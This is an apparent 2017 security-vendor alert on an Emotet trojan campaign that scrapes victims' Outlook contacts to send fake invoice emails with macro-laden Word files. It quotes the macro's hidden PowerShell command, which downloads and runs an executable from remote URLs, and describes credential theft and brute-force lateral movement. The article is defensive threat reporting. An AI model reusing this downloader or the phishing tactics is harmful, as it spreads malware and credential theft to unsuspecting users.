Security Alert
Jonathan Crowe
Jul 2017

Emotet Trojan Reads Your Email, Uses it to Infect More Victims

Not only does the latest version of Emotet steal a variety of credentials from its victims, it also raids their Outlook account for names and email addresses, then uses it to send out spam messages designed to spread the infection.

Key Details

  • What's happening?

    A new wave of Emotet trojan infections is spreading via phishing emails sent from compromised Outlook accounts. 

  • What do the phishing emails look like?

    The emails are disguised to look like invoice notices sent by contacts the recipient has emailed in the past, perhaps even recently. They include a link that downloads a malicious Word document. 

  • What is Emotet?

    Emotet has traditionally been recognized as a banking trojan, though in this case it appears to be serving as more of a general credential stealer and potentially a downloader for additional malware.

  • Barkly blocks these attacks before Emotet can even be downloaded

    These attacks rely on an Office macro hidden in the "invoice" Word doc to download the Emotet payload using a PowerShell command. Barkly sees that suspicious behavior and blocks it before the command can be completed. Watch for yourself in the video below:

  • Additional ways to protect your company:

    Phishing emails with fake invoices aren't exactly a new threat, but when they come from a vendor your company uses they can be convincing. Share this alert with your users so they can be especially wary of this threat, and if possible, consider disabling macros by default across your organization.

  • empty
  • empty
  • empty

ALERT: Due to a recent surge of Emotet activity and requests for assistance, we're providing more information on how to stop infections and how Barkly can help.
Get help

New Emotet campaigns use victim email accounts to spread the infection

A new wave of phishing emails have been spotted this week distributing Emotet, a credential-stealing trojan that's been actively ramping up activities and evolving since May.  

At first glance, these appear to be a fairly run-of-the-mill phishing campaigns complete with booby-trapped Word documents disguised as invoices. But on further investigation, it appears Emotet is taking things a step further by scraping names and email addresses from victim Outlook accounts, then using that info to send out additional phishing emails from the compromised accounts.

As a result, the emails in these campaigns look as though they've been sent from a contact the recipient knows and has emailed in the past. That can naturally increase their effectiveness, and earlier this week Barkly prevented an infection at one of our customers, where an employee opened and clicked on the email below:


There are plenty of flags here that security awareness programs can train users to recognize, but the simple fact is because the email appeared to be from a vendor the recipient knew, it was instantly more credible.

Clicking on the link in the email downloaded a Microsoft Word document that instructed the user they needed to enable macros in order to view it. 

Screen Shot 2017-07-27 at 12.43.46 AM.png

Once enabled, a macro in the Word doc attempted to launch the following PowerShell command designed to grab the Emotet payload, which appears to be hosted on a number of compromised websites. 

"powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = ',,,,'.Split(',');$name = $, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}",

At this point, Barkly's behavior analysis noticed the macro attempting to do something it shouldn't and immediately shut down the attack. By blocking the command from executing, Barkly prevented the Emotet payload from even touching the machine. 

Blocking Emotet before it lands on a device is crucial, because once there it has several tricks up its sleeve to designed to spread the infection laterally inside the organization and externally, as well. 


Abusing victim email accounts to send more phishing emails

According to analysis from Fortinet, once it's set up shop on an infected device, one of Emotet's tasks is to scour the victim's Microsoft Outlook account by reading the PST file, which stores email messages, calendar info, and more. It specifically hones in on any email messages with an unread status, and collects the sender name and email address from each unread message.

The stolen names and email addresses are stored in a temporary file, then encrypted and delivered to a command and control (C&C) server.

The C&C server responds by sending back the phishing email message along with the email addresses the message will be sent to. From there, Emotet utilizes SMTP protocol to send out the emails, keeping the campaign alive and spreading to new victims.

Emotet doesn't stop there, however. It continues the attack on the original infected device by stealing additional account credentials, including but not limited to:

  • Google accounts
  • Office Outlook
  • FTP accounts saved in IE
  • MSN Messenger
  • Google Talk
  • IncrediMail
  • Group Mail
  • Mozilla Thunderbird

Lateral movement

Researchers from Fidelis Security have also observed recent variants of Emotet exercising internal network propagation capabilities similar to the QakBot banking trojan. These mostly rely on attempts at brute-forcing any shares or accounts that allow it to write a file and create a remote service, which it tries to disguise with the name, "Windows Defender System Service". The service then writes Emotet to the remote computer and executes it.

If successful, this propagation technique significantly raises the impact of an Emotet infection. Rather than dealing with a single compromised machine, you could have infections thoughout the organization to deal with.

Even if it isn't successful, because brute-forcing is involved, infections also introduce the risk of account lockouts en masse (a major problem seen with QakBot infections earlier this year).

Protecting your company from Emotet

Phishing emails disguised as fake invoices are nothing new, but when they look like they're coming from a vendor your company actually does business with, they can be convincing. 

Sharing this alert with your users so they can be especially wary of this threat is a good place to start, but you should also take steps to ensure you're prepared for any mistakes or unfortunate clicks that do happen.

If possible, consider disabling macros by default across your organization. Explain to users that when a document they download from an email asks them to enable macros or "enable content" that's a major red flag.

Making sure AV is installed and up-to-date across your organization is another must, but for more complete protection you should also have endpoint protection that detects and blocks malicious behaviors.

At the time of this writing, this new variant of Emotet has a very low detection rate among traditional security products. The customer Barkly protected on Wednesday was running a major AV solution that missed the attack completely. Learn more about how Barkly compliments AV and fills in the gaps in AV protection.

SHA256 hash: 


Jonathan Crowe

Jonathan Crowe

Jonathan covers the latest threats and cybersecurity trends from a practical perspective.


Emotet Survival Handbook

How to deal with active infections and protect your company from 2018's most prevalent threat.

Look inside


Stay informed!

Get the latest security news, tips, and trends straight to your inbox.